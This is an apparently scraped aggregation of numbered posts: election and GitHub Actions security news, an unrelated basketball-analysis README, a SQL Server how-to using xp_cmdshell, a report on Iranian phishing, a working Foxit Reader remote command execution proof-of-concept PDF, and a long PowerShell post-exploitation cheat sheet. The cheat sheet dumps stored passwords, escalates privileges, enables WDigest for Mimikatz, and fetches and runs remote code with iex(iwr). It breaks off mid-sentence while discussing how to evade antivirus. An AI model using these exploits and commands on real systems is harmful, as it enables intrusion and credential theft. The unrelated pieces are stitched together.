  10. © Greg Nash Officials on alert for potential cyber threats after a quiet Election Day Election officials are cautiously declaring victory after no reports of major cyber incidents on Election Day. But the long shadow of 2016, when the U.S. fell victim to extensive Russian interference, has those same officials on guard for potential attacks as key battleground states tally up remaining ballots. Agencies that have worked to bolster election security over the past years are still on high alert during the vote-counting process, noting that the election is not over even if ballots have already been cast. Election officials at all levels of government have been hyper-focused on the security of the voting process since 2016, when the nation was caught off-guard by a sweeping and sophisticated Russian interference effort that included targeting election infrastructure in all 50 states, with Russian hackers gaining access to voter registration systems in Florida and Illinois. While there was no evidence that any votes were changed or voters prevented from casting a ballot, the targeted efforts created renewed focus on the cybersecurity of voting infrastructure, along with the improving ties between the federal government and state and local election officials. In the intervening years, former DHS Secretary Jeh Johnson designated elections as critical infrastructure, and Trump signed into law legislation in 2018 creating CISA, now the main agency coordinating with state and local election officials on security issues. In advance of Election Day, CISA established a 24/7 operations center to help coordinate with state and local officials, along with social media companies, election machine vendors and other stakeholders. Hovland, who was in the operations center Tuesday, cited enhanced coordination as a key factor for securing this year's election, along with cybersecurity enhancements including sensors on infrastructure in all 50 states to sense intrusions. Top officials were cautiously optimistic Wednesday about how things went. Sen. Mark Warner (D-Va.), the ranking member on the Senate Intelligence Committee, said it was clear agencies including Homeland Security, the FBI and the intelligence community had "learned a ton of lessons from 2016." He cautioned that "we're almost certain to discover something we missed in the coming weeks, but at the moment it looks like these preparations were fairly effective in defending our infrastructure." A major election security issue on Capitol Hill over the past four years has focused on how to address election security threats, particularly during the COVID-19 pandemic, when election officials were presented with new challenges and funding woes. Congress has appropriated more than $800 million for states to enhance election security since 2018, along with an additional $400 million in March to address pandemic-related obstacles. But Democrats and election experts have argued the $800 million was just a fraction of what's required to fully address security threats, such as funding permanent cybersecurity professionals in every voting jurisdiction, and updating vulnerable and outdated election equipment. Threats from foreign interference have not disappeared, and threats to elections will almost certainly continue as votes are tallied, and into future elections. A senior CISA official told reporters late Tuesday night that the agency was watching for threats including disinformation, the defacement of election websites, distributed denial of service attacks on election systems and increased demand on vote reporting sites taking systems offline. With Election Day coming only weeks after Director of National Intelligence John Ratcliffe and other federal officials announced that Russia and Iran had obtained U.S. voter data and were attempting to interfere in the election process, the threats were only underlined. Via msn.com
  11. Kev

    Spam caller

    Un caz de nu ai rude in U.S.A.
  12. Code shack describes issue as 'moderate' security flaw, plans to disable risky commands gradually Google's bug-hunting Project Zero team has posted details of an injection vulnerability in GitHub Actions after refusing a request to postpone disclosure. The issue arises due to the ability to set environment variables that are then parsed for execution by GitHub Actions. According to the Project Zero disclosure: "As the runner process parses every line printed to STDOUT looking for workflow commands, every Github action that prints untrusted content as part of its execution is vulnerable. In most cases, the ability to set arbitrary environment variables results in remote code execution as soon as another workflow is executed." The problem was discovered in July and reported to GitHub, which issued an advisory deprecating the vulnerable commands, set-env and add-path. GitHub also posted a description of the issue which means that the information posted by Project Zero, while more detailed and including examples, is not such a big reveal. The security hole was assigned CVE-2020-15228 and rated as medium severity. It's hard to fix, as Project Zero researcher Felix Wilhelm noted: "The way workflow commands are implemented is fundamentally insecure." GitHub's solution is to gradually remove the risky commands. The trade-off is that removing the commands will break workflows that use them, but leaving them in place means the vulnerability remains, so folks will be eased off the functionality over time. The Project Zero timeline indicates some frustration with GitHub's response. Normally bug reports are published 90 days after a report is sent to the vendor, or whenever a problem is fixed, whichever is sooner, though this can be extended. On 12 October Project Zero said it told GitHub "that a grace period is available" if it needed more time to disable the vulnerable commands. The response from GitHub was to request a standard 14-day extension to 2 November. On 30 October, Google noted: "Due to no response and the deadline closing in, Project Zero reaches out to other informal Github contacts. The response is that the issue is considered fixed and that we are clear to go public on 2020-11-02 as planned." The implication of that statement is that the post might have been further delayed, yet when GitHub then requested an additional 48 hours "to notify customers," Project Zero said there was "no option to further extend the deadline as this is day 104 (90 days + 14 day grace extension)." Mark Penny, a security researcher at nCipher Security, said on Twitter: GitHub has not ignored the problem, but rather has taken steps towards eventually disabling the insecure feature and providing users with an alternative, so it is hard to see the benefit in disclosure other than in the general sense of putting pressure on vendors to come up with speedy fixes. November has not started well for GitHub. The second day of the month saw the site broken by an expired SSL certificate. Along with all the Twitter complaints, one user found something to be grateful for: "@github your certificate for the assets is expired today … Thanks for showing us that this can happen to everyone, small and big companies." ® Via theregister.com
  13. This is an artificial intelligence application built on the concept of object detection. Analyze basketball shots by digging into the data collected from object detection. We can get the result by simply uploading files to the web App, or submitting a POST request to the API. Please check the features below. There are more features coming up! Feel free to follow. All the data for the shooting pose analysis is calculated by implementing OpenPose. Please note that this is an implementation only for noncommercial research use only. Please read the LICENSE, which is exaclty same as the CMU's OpenPose License. If your are interested in the concept of human pose estimation, I have written a research paper summary of OpenPose. Check it out! Getting Started These instructions will get you a copy of the project up and running on your local machine. Get a copy Get a copy of this project by simply running the git clone command. git clone https://github.com/chonyy/AI-basketball-analysis.git Prerequisites Before running the project, we have to install all the dependencies from requirements.txt pip install -r requirements.txt Please note that you need a GPU with proper CUDA setup to run the video analysis, since a CUDA device is required to run OpenPose. Hosting Last, get the project hosted on your local machine with a single command. python app.py Alternatives This project is also hosted on Heroku. However, the heavy computation of TensorFlow may cause Timeout error and crash the app (especially for video analysis). Therefore, hosting the project on your local machine is more preferable. Please note that the shooting pose analysis won't be running on the Heroku hosted website, since a CUDA device is required to run OpenPose. Project Structure Features This project has three main features, shot analysis, shot detection, detection API. Shot and Pose analysis Shot counting Counting shooting attempts and missing, scoring shots from the input video. Detection keypoints in different colors have different meanings listed below: Blue: Detected basketball in normal status Purple: Undetermined shot Green: Shot went in Red: Miss Pose analysis Implementing OpenPose to calculate the angle of elbow and knee during shooting. Release angle and release time are calculated by all the data collected from shot analysis and pose analysis. Please note that there will be a relatively big error for the release time since it was calculated as the total time when the ball is in hand. Shot detection Detection will be shown on the image. The confidence and the coordinate of the detection will be listed below. Detection API Get the JSON response by submitting a POST request to (./detection_json) with "image" as KEY and input image as VALUE. Detection model The object detection model is trained with the Faster R-CNN model architecture, which includes pretrained weight on COCO dataset. Taking the configuration from the model architecture and train it on my own dataset. Future plans Host it on azure web app service. Improve the efficiency, making it executable on web app services. Download: AI-basketball-analysis-master.zip or git clone https://github.com/chonyy/AI-basketball-analysis.git Source
  14. # Exploit Title: Foxit Reader 9.7.1 - Remote Command Execution (Javascript API) # Exploit Author: Nassim Asrir # Vendor Homepage: https://www.foxitsoftware.com/ # Description: Foxit Reader before 10.0 allows Remote Command Execution via the unsafe app.opencPDFWebPage JavaScript API which allows an attacker to execute local files on the file system and bypass the security dialog. The exploit process need the user-interaction (Opening the PDF) . + Process continuation #POC %PDF-1.4 %ÓôÌá 1 0 obj << /CreationDate(D:20200821171007+02'00') /Title(Hi, Can you see me ?) /Creator(AnonymousUser) >> endobj 2 0 obj << /Type/Catalog /Pages 3 0 R /Names << /JavaScript 10 0 R >> >> endobj 3 0 obj << /Type/Pages /Count 1 /Kids[4 0 R] >> endobj 4 0 obj << /Type/Page /MediaBox[0 0 595 842] /Parent 3 0 R /Contents 5 0 R /Resources << /ProcSet [/PDF/Text/ImageB/ImageC/ImageI] /ExtGState << /GS0 6 0 R >> /Font << /F0 8 0 R >> >> /Group << /CS/DeviceRGB /S/Transparency /I false /K false >> >> endobj 5 0 obj << /Length 94 /Filter/FlateDecode >> stream xœŠ»@@EûùŠ[RØk ­x•ÄüW"DDçëœâžÜœ›b°ý“{‡éTg†¼tS)dÛ‘±=dœþ+9Ÿ_ÄifÔÈŒ [ŽãB_5!d§ZhP>¯ ‰ endstream endobj 6 0 obj << /Type/ExtGState /ca 1 >> endobj 7 0 obj << /Type/FontDescriptor /Ascent 833 /CapHeight 592 /Descent -300 /Flags 32 /FontBBox[-192 -710 702 1221] /ItalicAngle 0 /StemV 0 /XHeight 443 /FontName/CourierNew,Bold >> endobj 8 0 obj << /Type/Font /Subtype/TrueType /BaseFont/CourierNew,Bold /Encoding/WinAnsiEncoding /FontDescriptor 7 0 R /FirstChar 0 /LastChar 255 /Widths[600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600] >> endobj 9 0 obj << /S/JavaScript /JS(app.opencPDFWebPage\('C:\\\\Windows\\\\System32\\\\calc.exe'\) ) >> endobj 10 0 obj << /Names[(EmbeddedJS)9 0 R] >> endobj xref 0 11 0000000000 65535 f 0000000015 00000 n 0000000170 00000 n 0000000250 00000 n 0000000305 00000 n 0000000560 00000 n 0000000724 00000 n 0000000767 00000 n 0000000953 00000 n 0000002137 00000 n 0000002235 00000 n trailer << /ID[<7018DE6859F23E419162D213F5C4D583><7018DE6859F23E419162D213F5C4D583>] /Info 1 0 R /Root 2 0 R /Size 11 >> startxref 2283 %%EOF Source exploit-db.com
  15. In this article, I am going to show how we can automate the report of unused database files using T-SQL. Introduction Often organizations have a well-defined process to decommission the client database. I had helped one of the customers to establish the process of decommissioning the client database. Before decommissioning the client database, they want me to generate the backup of the customer database and detach the primary and secondary datafiles and transactional log files. I have created a SQL Server job to automate the entire process. In this process, there is a glitch. After decommissioning the database, the data files and log files are left unattended. Due to that, the disk drives start getting full. To fix this issue, we decided to create another SQL Job to generate the list of the unused database files and log files and email them to the stack holders. They verify the list of files and provide the approval to delete the files. I had created a stored procedure to identify the list of database files and log files that are not attached to any database and display the output in the HTML formatted table and email it using the database mail. The script performs the following tasks: Define temp tables to save the list of the drives and database files Use xp_fixeddrives to save the drive letter and free space in the #tbldrive table Use the dir command to get the list of all database files and store them in the #tblFiles table Compare the list of the files to the output of sys.master_files to get the physical files that are not in the database Create temp tables First, let us create a temp table named #tbldrive to save the list of the drives and free space in the drive and #tblFiles to insert the list of the physical location of files that has *.mdf, *.ndf, and *.ldf extensions. Following is the T-SQL query to create the tables: create table #tbldrive (ID INT IDENTITY(1,1), [DriveLetter] VARCHAR(1), [Free_Space] INT) Go create table #tblFiles (ID INT IDENTITY(1,1), [FilePath] NVARCHAR(max)) Go Insert drive letter details in temp table Run the following T-SQL query to insert the list of drives and free space in the #tbldrive table. INSERT INTO #tbldrive ([DriveLetter], [Free_Space]) EXEC xp_fixeddrives; Insert list of files in temp table To insert the list of the physical location of in temp table, we must create a dynamic T-SQL query that uses the drive letters stored in #tbldrive and create a dir command. In the dir command, we are going to use /S /B flags. The /S /B returns the full path of the files with *.mdf and *.ldf extensions. The following code generates the dir command. DECLARE @DriveLetter NVARCHAR(1); DECLARE @DriveCommand NVARCHAR(4000); DECLARE @i INT; WHILE ISNULL(@i, 0) > 0 BEGIN --get next available drive SET @DriveLetter = (SELECT [DriveLetter] FROM #tbldrive WHERE ID = @i); --create the command to get directory information SET @DriveCommand = N'dir ' + @DriveLetter + ':\*.*df /S/B'; --get directory information for the current drive select @DriveCommand SET @i = (SELECT [ID] + 1 FROM #tbldrive WHERE ID = @i); IF @i IS NULL SET @i = 0; END; Command Output: Now, as mentioned, we will insert the output of the command in #tblFiles. To do that, add the following T-SQL query block in the while loop. INSERT INTO #tblFiles ([FilePath]) EXEC xp_cmdshell @DriveCommand; The entire code block is as the following: set nocount on; DECLARE @DriveLetter NVARCHAR(1); DECLARE @DriveCommand NVARCHAR(4000); DECLARE @i INT; SET @i = 1; WHILE ISNULL(@i, 0) > 0 BEGIN --get next available drive SET @DriveLetter = (SELECT [DriveLetter] FROM #tbldrive WHERE ID = @i); --create the command to get directory information SET @DriveCommand = N'dir ' + @DriveLetter + ':\*.*df /S/B'; --get directory information for the current drive INSERT INTO #tblFiles ([FilePath]) EXEC xp_cmdshell @DriveCommand; SET @i = (SELECT [ID] + 1 FROM #tbldrive WHERE ID = @i); IF @i IS NULL SET @i = 0; END; select FilePath from #tblFiles drop table #tbldrive drop table #tblFiles Output of the list of physical location of the mdf and ldf file are the following: Compare the list with an output of sys.master_files Now, we will compare the list of the physical locations in #tblfile with the list of the values of the physical_name column in the sys.master_files DMV. Following is the code: select FilePath from #tblFiles where FilePath not in (select physical_name from sys.master_files) and FilePath not like 'C:\%' and (FilePath like '%mdf' OR FilePath like '%ndf' OR FilePath like '%ldf' ) The output is the following: Now, to display the output in email, we will use HTML code. The HTML code the table will be stored in the @HTMLTable variable. The data type of the variable is nvarchar(max). Following is the code: SET @UnusedDatabaseFiles = '<table id="AutoNumber1" style="BORDER-COLLAPSE: collapse" borderColor="#111111" height="40" cellSpacing="0" cellPadding="0" width="50%" border="1"> <tr> <td width="27%" bgColor="#D3D3D3" height="15"><b> <font face="Verdana" size="1" color="#FFFFFF">Database Files </font></b></td> </tr> <p style="margin-top: 1; margin-bottom: 0">&nbsp;</p> <p><font face="Verdana" size="4">List of unused database files</font></p>' SELECT @UnusedDatabaseFiles = @UnusedDatabaseFiles + '<tr><td><font face="Verdana" size="1">' + CONVERT(VARCHAR, filepath) + '</font></td></tr>' FROM #tblfiles WHERE filepath NOT IN (SELECT physical_name FROM sys.master_files) AND filepath NOT LIKE 'C:\%' AND ( filepath LIKE '%mdf' OR filepath LIKE '%ndf' OR filepath LIKE '%ldf' ) To send the email, we will use the SQL Server database mail. I have already created a database mail profile named OutlookMail. The code to email the list of unused database files is as following: EXEC msdb.dbo.sp_send_dbmail @profile_name = 'yourmailprofile', @recipients='n******87@outlook.com', @subject = 'List of unused database files', @body = @UnusedDatabaseFiles, @body_format = 'HTML' ; Create a SQL Server Agent Job Once the stored procedure is created, we will use the SQL Server Agent job to automate it. For that, Open SQL Server Management studio Expand SQL Server Instance Expand SQL Server Agent Right-click on Jobs Select New Job. On the New Job dialog box, provide the desired name of the SQL job in Jab Name text box. Click on Steps and click on New to create a job step. In the New Job Step dialog box, choose Transact-SQL from the Type drop-down box and enter the following T-SQL code in command textbox. Use DBA GO Exec sp_getunuseddatabases Click OK to save the step and close the dialog box. We will schedule the execution of this job every week on Monday at 9:00 AM; therefore, configure the schedule accordingly. To do that, click on Schedules in the New Job dialog box. On the New Schedule dialog box, enter the desired schedule name in Name textbox choose weekly from the occurs drop-down box click on Monday checkbox enter 09:00:00 in Occurs once at the textbox. See the following screenshot Click OK to save the schedule and close the New Job Schedule dialog box. Click OK to save the SQL Job. Now let us test the SQL job. To do that, right-click on the SQL job and click ok Run job at step. Once the job completes the execution, you will receive the email, as shown below. Summary In this article, I have shown a T-SQL Script that is used to generate a list of unused database data files and log files. Moreover, I have also explained how we can display the list of the files in an HTML formatted table and automate the report using SQL Server Agent Job. Source sqlshack.com
  16. https://www.ekscaffolddesign.com/2D-SCAFFOLD-DESIGN-DRAWINGS-AND-CALCULATIONS.html
  17. NATO Secretary General Jens Stoltenberg addresses the Munich Security Conference in 2015. (NATO / Flickr) Iranian government-linked hackers have been sending spearphishing emails to large swaths of high-profile potential attendees of the upcoming Munich Security Conference as well as the Think 20 Summit in Saudi Arabia, according to Microsoft research. The Iranian attackers, known as Phosphorous, have disguised themselves as conference organizers and have sent fake invitations containing PDF documents with malicious links to over 100 possible invitees of the conferences, both of which are prominent summits dedicated to international security and policies of the world’s largest economies, respectively. In some cases the attackers have been successful in guiding some victims to those links, which lead victims to credential-harvesting pages, Tom Burt, corporate vice president of Microsoft Security and Trust announced in a blog published Wednesday morning. Microsoft did not say what information, if any, the attackers successful stole from victims. It was just the latest example of Phosphorous targeting non-governmental entities — the group has been known to target journalists and researchers who focus on Iran in the past, for instance. The hackers typically also go after entities in the military, energy, business services, and telecommunications sectors throughout the U.S. and the Middle East, according to previous FireEye research. The Iranian government-linked hackers tend to conduct long-term strategic intelligence gathering, according to FireEye. Although Microsoft is releasing the information on the threat to Munich Security Conference attendees in close proximity to the U.S. presidential elections, Microsoft researchers do not believe this specific campaign is linked with the election. But the same hackers behind this operation, also known as APT35 or Charming Kitten, have targeted associates of President Donald Trump’s reelection campaign before, according to previous Microsoft and Google research. In recent months the hackers have targeted the Trump campaign, according to research Microsoft published last month and Google research published in June. The same group was targeting journalists and the email accounts of people associated with the Trump campaign one year ago as well. Via cyberscoop.com
  18. This article contains a list of PowerShell commands collected from various corners of the Internet which could be helpful during penetration tests or red team exercises. The list includes various post-exploitation one-liners in pure PowerShell without requiring any offensive (= potentially flagged as malicious) 3rd party modules, but also a bunch of handy administrative commands. Let’s get to it! Table Of Contents Locating files with sensitive information Find potentially interesting files Find credentials in Sysprep or Unattend files Find configuration files containing “password” string Find database credentials in configuration files Locate web server configuration files Extracting credentials Get stored passwords from Windows PasswordVault Get stored passwords from Windows Credential Manager Dump passwords from Google Chrome browser Get stored Wi-Fi passwords from Wireless Profiles Search for SNMP community string in registry Search for string pattern in registry Privilege escalation Search registry for auto-logon credentials Check if AlwaysInstallElevated is enabled Find unquoted service paths Check for LSASS WDigest caching Credentials in SYSVOL and Group Policy Preferences (GPP) Network related commands Set MAC address from command-line Allow Remote Desktop connections Host discovery using mass DNS reverse lookup Port scan a host for interesting ports Port scan a network for a single port (port-sweep) Create a guest SMB shared drive Whitelist an IP address in Windows firewall Other useful commands File-less download and execute Get SID of the current user Check if we are running with elevated (admin) privileges Disable PowerShell command logging List installed antivirus (AV) products Conclusion Locating files with sensitive information The following PowerShell commands can be handy during post-exploitation phase for locating files on disk that may contain credentials, configuration details and other sensitive information. Find potentially interesting files With this command we can identify files with potentially sensitive data such as account information, credentials, configuration files etc. based on their filename: gci c:\ -Include *pass*.txt,*pass*.xml,*pass*.ini,*pass*.xlsx,*cred*,*vnc*,*.config*,*accounts* -File -Recurse -EA SilentlyContinue Although this can produce a lot of noise, it can also yield some very interesting results. Recommended to do this for every disk drive, but you can also just run it on the c:\users folder for some quick wins. Find credentials in Sysprep or Unattend files This command will look for remnants from automated installation and auto-configuration, which could potentially contain plaintext passwords or base64 encoded passwords: gci c:\ -Include *sysprep.inf,*sysprep.xml,*sysprep.txt,*unattended.xml,*unattend.xml,*unattend.txt -File -Recurse -EA SilentlyContinue This is one of the well known privilege escalation techniques, as the password is typically local administrator password. Recommended to do this for every disk drive. Find configuration files containing “password” string With this command we can locate files containing a certain pattern, e.g. here were are looking for a “password” pattern in various textual configuration files: gci c:\ -Include *.txt,*.xml,*.config,*.conf,*.cfg,*.ini -File -Recurse -EA SilentlyContinue | Select-String -Pattern "password" Although this can produce a lot of noise, it could also yield some interesting results as well. Recommended to do this for every disk drive. Find database credentials in configuration files Using the following PowerShell command we can find database connection strings (with plaintext credentials) stored in various configuration files such as web.config for ASP.NET configuration, in Visual Studio project files etc.: gci c:\ -Include *.config,*.conf,*.xml -File -Recurse -EA SilentlyContinue | Select-String -Pattern "connectionString" Finding connection strings e.g. for a remote Microsoft SQL Server could lead to a Remote Command Execution (RCE) using the xp_cmdshell functionality (link, link, link etc.) and consequent lateral movement. Locate web server configuration files With this command, we can easily find configuration files belonging to Microsoft IIS, XAMPP, Apache, PHP or MySQL installation: gci c:\ -Include web.config,applicationHost.config,php.ini,httpd.conf,httpd-xampp.conf,my.ini,my.cnf -File -Recurse -EA SilentlyContinue These files may contain plain text passwords or other interesting information which could allow accessing other resources such as databases, administrative interfaces etc. Go back to top. Extracting credentials The following PowerShell commands also fall under the post-exploitation category and they can be useful for extracting credentials after gaining access to a Windows system. Get stored passwords from Windows PasswordVault Using the following PowerShell command we can extract secrets from the Windows PasswordVault, which is a Windows built-in mechanism for storing passwords and web credentials e.g. for Internet Explorer, Edge and other applications: [Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];(New-Object Windows.Security.Credentials.PasswordVault).RetrieveAll() | % { $_.RetrievePassword();$_ } Note that the vault is typically stored in the following locations and it is only possible to retrieve the secrets under the context of the currently logged user: C:\Users\<USERNAME>\AppData\Local\Microsoft\Vault\ C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Vault\ C:\ProgramData\Microsoft\Vault\ More information about Windows PasswordVault can be found here. Get stored passwords from Windows Credential Manager Windows Credential Manager provides another mechanism of storing credentials for signing in to websites, logging to remote systems and various applications and it also provides a secure way of using credentials in PowerShell scripts. With the following one-liner, we can retrieve all stored credentials from the Credential Manager using the CredentialManager PowerShell module: Get-StoredCredential | % { write-host -NoNewLine $_.username; write-host -NoNewLine ":" ; $p = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($_.password) ; [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($p); } Similarly to PasswordVault, the credentials are stored in individual user profile locations and only the currently logged user can decrypt theirs: C:\Users\<USERNAME>\AppData\Local\Microsoft\Credentials\ C:\Users\<USERNAME>\AppData\Roaming\Microsoft\Credentials\ C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Credentials\ Dump passwords from Google Chrome browser The following command extracts stored credentials from the Google Chrome browser, if is installed and if there are any passwords stored: [System.Text.Encoding]::UTF8.GetString([System.Security.Cryptography.ProtectedData]::Unprotect($datarow.password_value,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)) Similarly, this has to be executed under the context of the target (victim) user. Get stored Wi-Fi passwords from Wireless Profiles With this command we can extract all stored Wi-Fi passwords (WEP, WPA PSK, WPA2 PSK etc.) from the wireless profiles that are configured in the Windows system: (netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize Note that we have to have administrative privileges in order for this to work. Search for SNMP community string in registry The following command will extract SNMP community string stored in the registry, if there is any: gci HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse -EA SilentlyContinue Finding a SNMP community string is not a critical issue, but it could be useful to: Understand what kind of password patterns are used among sysadmins in the organization Perform password spraying attack (assuming that passwords might be re-used elsewhere) Search for string pattern in registry The following PowerShell command will sift through the selected registry hives (HKCR, HKCU, HKLM, HKU, and HKCC) and recursively search for any chosen pattern within the registry key names or data values. In this case we are searching for the “password” pattern: $pattern = "password" $hives = "HKEY_CLASSES_ROOT","HKEY_CURRENT_USER","HKEY_LOCAL_MACHINE","HKEY_USERS","HKEY_CURRENT_CONFIG" # Search in registry keys foreach ($r in $hives) { gci "registry::${r}\" -rec -ea SilentlyContinue | sls "$pattern" } # Search in registry values foreach ($r in $hives) { gci "registry::${r}\" -rec -ea SilentlyContinue | % { if((gp $_.PsPath -ea SilentlyContinue) -match "$pattern") { $_.PsPath; $_ | out-string -stream | sls "$pattern" }}} Although this could take a lot of time and produce a lot of noise, it will certainly find every occurrence of the chosen pattern in the registry. Privilege escalation The following sections contain PowerShell commands useful for privilege escalation attacks – for cases when we only have a low privileged user access and we want to escalate our privileges to local administrator. Search registry for auto-logon credentials Windows systems can be configured to auto login upon boot, which is for example used on POS (point of sale) systems. Typically, this is configured by storing the username and password in a specific Winlogon registry location, in clear text. The following command will get the auto-login credentials from the registry: gp 'HKLM:\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon' | select "Default*" Check if AlwaysInstallElevated is enabled If the following AlwaysInstallElevated registry keys are set to 1, it means that any low privileged user can install *.msi files with NT AUTHORITY\SYSTEM privileges. Here’s how to check it with PowerShell: gp 'HKCU:\Software\Policies\Microsoft\Windows\Installer' -Name AlwaysInstallElevated gp 'HKLM:\Software\Policies\Microsoft\Windows\Installer' -Name AlwaysInstallElevated Note that both registry keys have to be set to 1 in order for this to work. An MSI installer package can be easily generated using msfvenom utility from Metasploit Framework. For instance, we can add ourselves into the administrators group: msfvenom -p windows/exec CMD='net localgroup administrators joe /add' -f msi > pkg.msi Find unquoted service paths The following PowerShell command will print out services whose executable path is not enclosed within quotes (“): gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name This can lead to privilege escalation in case the executable path also contains spaces and we have write permissions to any of the folders in the path. More details about this technique including exploitation steps can be found here or here. Check for LSASS WDigest caching Using the following command we can check whether the WDigest credential caching is enabled on the system or not. This settings dictates whether we will be able to use Mimikatz to extract plaintext credentials from the LSASS process memory. (gp registry::HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\Wdigest).UseLogonCredential If the value is set to 0, then the caching is disabled (the system is protected) If it doesn’t exist or if it is set to 1, then the caching is enabled Note: that if it is disabled, we can still enable it using the following command, but we will also have to restart the system afterwards: sp registry::HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\Wdigest -name UseLogonCredential -value 1 Credentials in SYSVOL and Group Policy Preferences (GPP) In corporate Windows Active Directory environments, credentials can be sometimes found stored in the Group Policies, in various custom scripts or configuration files on the domain controllers in the SYSVOL network shares. Since the SYSVOL network shares are accessible to any authenticated domain user, we can easily identify if there are any stored credentials using the following command: Push-Location \\example.com\sysvol gci * -Include *.xml,*.txt,*.bat,*.ps1,*.psm,*.psd -Recurse -EA SilentlyContinue | select-string password Pop-Location One typical example is MS14-025 with cPassword attribute in the GPP XML files. The “cpassword” attribute can be instantly decrypted into a plaintext form e.g. by using gpp-decrypt utility in Kali Linux. Network related commands Here is a few network related PowerShell commands that can be useful particularly during internal network penetration tests and similar exercises. Set MAC address from command-line Sometimes it can be useful to set MAC address on a network interface and with PowerShell we can easily do it without using any 3rd party utility: Set-NetAdapter -Name "Ethernet0" -MacAddress "00-01-18-57-1B-0D" This can be useful e.g. when we are testing for NAC (network access control) bypass and other things. Allow Remote Desktop connections This command trio can be useful when we want to connect to the system using graphical RDP session, but it is not enabled for some reason: # Allow RDP connections (Get-WmiObject -Class "Win32_TerminalServiceSetting" -Namespace root\cimv2\terminalservices).SetAllowTsConnections(1) # Disable NLA (Get-WmiObject -class "Win32_TSGeneralSetting" -Namespace root\cimv2\terminalservices -Filter "TerminalName='RDP-tcp'").SetUserAuthenticationRequired(0) # Allow RDP on the firewall Get-NetFirewallRule -DisplayGroup "Remote Desktop" | Set-NetFirewallRule -Enabled True Now the port tcp/3389 should be open and we should be able to connect without a problem e.g. by using xfreerdp or rdesktop tools from Kali Linux. Host discovery using mass DNS reverse lookup Using this command we can perform quick reverse DNS lookup on the 10.10.1.0/24 subnet and see if there are any resolvable (potentially alive) hosts: $net = "10.10.1." 0..255 | foreach {$r=(Resolve-DNSname -ErrorAction SilentlyContinue $net$_ | ft NameHost -HideTableHeaders | Out-String).trim().replace("\s+","").replace("`r","").replace("`n"," "); Write-Output "$net$_ $r"} | tee ip_hostname.txt The results will be then saved in the ip_hostname.txt file in the current working directory. Sometimes this can be faster and more covert than a pingsweep or similar techniques. Port scan a host for interesting ports Here’s how to quickly port scan a specified IP address (10.10.15.232) for selected 39 interesting ports: $ports = "21 22 23 25 53 80 88 111 139 389 443 445 873 1099 1433 1521 1723 2049 2100 2121 3299 3306 3389 3632 4369 5038 5060 5432 5555 5900 5985 6000 6379 6667 8000 8080 8443 9200 27017" $ip = "10.10.15.232" $ports.split(" ") | % {echo ((new-object Net.Sockets.TcpClient).Connect($ip,$_)) "Port $_ is open on $ip"} 2>$null This will give us a quick situational awareness about a particular host on the network using nothing but a pure PowerShell: Port scan a network for a single port (port-sweep) This could be useful for example for quickly discovering SSH interfaces (port tcp/22) on a specified network Class C subnet (10.10.0.0/24): $port = 22 $net = "10.10.0." 0..255 | foreach { echo ((new-object Net.Sockets.TcpClient).Connect($net+$_,$port)) "Port $port is open on $net$_"} 2>$null If you are trying to identify just Windows systems, just change the port to 445. Create a guest SMB shared drive Here’s a cool trick to quickly start a SMB (CIFS) network shared drive accessible by anyone: new-item "c:\users\public\share" -itemtype directory New-SmbShare -Name "sharedir" -Path "C:\users\public\share" -FullAccess "Everyone","Guests","Anonymous Logon" To stop it afterwards, execute: Remove-SmbShare -Name "sharedir" -Force This could come handy for transferring files, exfiltration etc. Whitelist an IP address in Windows firewall Here’s a useful command to whitelist an IP address in the Windows firewall: New-NetFirewallRule -Action Allow -DisplayName "pentest" -RemoteAddress 10.10.15.123 Now we should be able to connect to this host from our IP address (10.10.15.123) on every port. After we are done with our business, remove the rule: Remove-NetFirewallRule -DisplayName "pentest" Other useful commands The following commands can be useful for performing various administrative tasks, for gathering information about the system or using additional PowerShell functionalities that can be useful during a pentest. File-less download and execute Using this tiny PowerShell command we can easily download and execute arbitrary PowerShell code that is hosted remotely – either on our own machine or on the Internet: iex(iwr("https://URL")) iwr = Invoke-WebRequest iex = Invoke-Expression The remote content will be downloaded and loaded without touching the disk (file-less). Now we can just run it. We can use this for any number of popular offensive modules, e.g.: https://github.com/samratashok/nishang https://github.com/PowerShellMafia/PowerSploit https://github.com/FuzzySecurity/PowerShell-Suite https://github.com/EmpireProject/Empire (modules here) Here’s an example of dumping local password hashes (hashdump) using nishang Get-PassHashes module: iex(iwr("https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Get-PassHashes.ps1"));Get-PassHashes Very easy, but note that this will be likely flagged by any decent AV or EDR. What you could do in cases like this is that you could obfuscate the modules that you want to use 